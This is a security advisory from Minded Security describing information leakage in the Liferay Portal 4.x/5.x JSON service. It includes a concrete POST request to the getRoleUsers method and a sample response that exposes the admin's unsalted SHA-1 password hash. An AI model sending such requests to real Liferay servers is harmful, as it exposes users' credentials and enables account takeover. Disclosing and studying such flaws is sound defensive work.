The Liferay JSON service suffers from multiple remote information disclosure vulnerabilities.
2eefe242df465b532ea4094ef0f4f75673c5d531310f8b98bab39ea2e08b2790
Minded Security Labs: Advisory #MSA251009
Liferay Json Service Multiple Information Leakage
Tested Versions:
Liferay Portal 4.x and 5.x
Minded Security ReferenceID:
MSA251009
Credits:
Discovery by
Stefano Di Paola of Minded Security
stefano.dipaola [_at_] mindedsecurity.com
Reference:
http://issues.liferay.com/browse/LPS-9555
Severity:
High: it is possible to access functionalities and
sensitive users' information.
Solution:
Grant access only to standard web functionalities and prevent direct
access to JSON service.
Summary
It is possible to access several classes and static methods and obtain serveral
sensitive information.
Analysis
It is possible to access several methods making a direct request to the following URL
https://<yoursite>/c/portal/json_service
via POST with a payload like the following:
callback=<JavascriptFunctionName>&serviceClassName=
com.liferay.portal.service.http.<ClassName>JSON&serviceMethodName=<
StaticMethodName>¶meter1=<Value>¶meter2=<Value>
&serviceParameters=parameter1,parameter2...etc
An authenticated user can perform a request like the previous to obtain an answere
from the server like the following:
HTTP/1.1 200 OK FunctionNameJs({response JSON object});
It was possible to analize the accessible methods and it was noted that several
classes and static methods are accessible, but a lot of them perform access control.
However, there are several methods that return information about users that do not
perform administrative access control or that are allowed to logged users.
This methods can be used to obtain sensitive information.
For example, an attacker could use the method "getRoleUsers" in order to obtain
internal Liferay passwords in SHA-1 format coded in Base64 making the following
request (administrative role id is 10107).
POST /c/portal/json_service HTTP/1.1 callback=ss&
serviceClassName=com.liferay.portal.service.http.UserServiceJSON
&serviceMethodName=getRoleUsers&roleId=10107&
screenName=getRoleUsers&serviceParameters=roleId HTTP/1.1 200 OK ss([{"portraitId":0,"agreedToTermsOfUse":true,"passwordEncrypted":true,
"screenName":"liferayadmin","password":"yg\/MD******************hs=",
"passwordReset":false,"defaultUser":false,
"lastFailedLoginDate":"1253900971","userId":10133....
As it is possible to see, inside the server answere there is the object related to
the admin user with his own password in SHA-1 format (without salt).
Disclosure Timeline
25/10/09 Issue found
12/05/10 Reported to Vendor
Disclaimer
The information within this paper may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever
arising out of or in connection with the use or spread of this
information.
Any use of this information is at the user's own risk.
Permission is hereby granted for the redistribution of this Alert
electronically. It is not to be edited in any way without express
consent of Minded Security Research Lab. If you wish to reprint the
whole or any part of this Alert in any other medium excluding
electronic medium, please e-mail research_at_mindedsecurity.com
for permission.
Copyright (c) 2010 Minded Security, S.r.l..
All rights reserved worldwide.